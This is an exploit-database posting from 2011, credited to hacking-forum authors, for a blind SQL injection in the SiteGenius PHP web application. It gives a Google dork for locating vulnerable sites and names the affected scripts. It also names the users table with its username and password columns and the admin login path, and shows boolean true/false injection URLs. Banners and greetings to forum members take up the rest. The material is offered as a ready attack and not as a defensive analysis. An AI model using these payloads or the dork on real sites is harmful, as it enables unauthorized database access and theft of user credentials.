SiteGenius Blind SQL injection Vulnerability

2011-08-02T00:00:00
ID 1337DAY-ID-16589
Type zdt
Reporter dR.sqL
Modified 2011-08-02T00:00:00

Description

Exploit for php platform in category web applications

                                        
                                            =====================================================
SiteGenius  Blind SQL injection vulnerability
=====================================================
 
 
# Exploit title : SiteGenius Blind SQL injection vulnerability
# Date : 02 \ 08 \ 2011
# Author : AutoRUN  & dR.sqL
# Home : HackForums.AL , AutoRUN-Albania.COM , whiteh4t.net,  HackingWith.US ,
# Software Link : http://www.sitegenius.com
# Tested on : Windows XP & Linux
# Category : web apps
# Google Dork : inurl:"sitegenius/topic.php?id="
# Versions affected : All
 
----------------------------------
#      ~  ExpL0!taTi0N ~       #
----------------------------------
 
Affected files : topic.php & article.php
 
SQLi (blind) details: Table: users ; Columns: username & password ; Panel (admin): /sitegenius/login.php
 
 
Exploit : http://localhost/sitegenius/topic.php?id=1 and 1=1  --> TRUE
             http://localhost/sitegenius/topic.php?id=1 and 1=2  --> FALSE
 
w00t!! Blind SQL injection !
 
 
     _         _        ____  _   _ _   _    ___         _ ____              _    
    / \  _   _| |_ ___ |  _ \| | | | \ | |  ( _ )     __| |  _ \   ___  __ _| |   
   / _ \| | | | __/ _ \| |_) | | | |  \| |  / _ \/\  / _` | |_) | / __|/ _` | |   
  / ___ \ |_| | |_ (_) |  _ <| |_| | |\  | | (_>  < | (_| |  _ < _\__ \ (_| | |___
 /_/   \_\__,_|\__\___/|_| \_\\___/|_| \_|  \___/\/  \__,_|_| \_(_)___/\__, |_____|
                                                                          |_|     
 
 
 
 
# Greetz : Programer , Dr.moka, eragon, BaDBoY-AL , z3r0w1zard , Red Dragon_aL , Pretorian ,Th3_Power ,
                R-t33n , Ace Wizard, KubaNnez1 , 1Nj3ct0r-4L, AHG , ssgodfather, DJDukli , b4ti , #tupac.al, CroSs HackForums.AL members & All our friends.
 
  ____                      _   ____  ____       _    _ _                 _               _
 |  _ \ _ __ ___  _   _  __| | |___ \| __ )     / \  | | |__   __ _ _ __ (_) __ _ _ __   | |
 | |_) | '__/ _ \| | | |/ _` |   __) |  _ \    / _ \ | | '_ \ / _` | '_ \| |/ _` | '_ \  | |
 |  __/| | | (_) | |_| | (_| |  / __/| |_) |  / ___ \| | |_) | (_| | | | | | (_| | | | | |_|
 |_|   |_|  \___/ \__,_|\__,_| |_____|____/  /_/   \_\_|_.__/ \__,_|_| |_|_|\__,_|_| |_| (_)
                                                                                              
  
# 2011



#  0day.today [2018-04-11]  #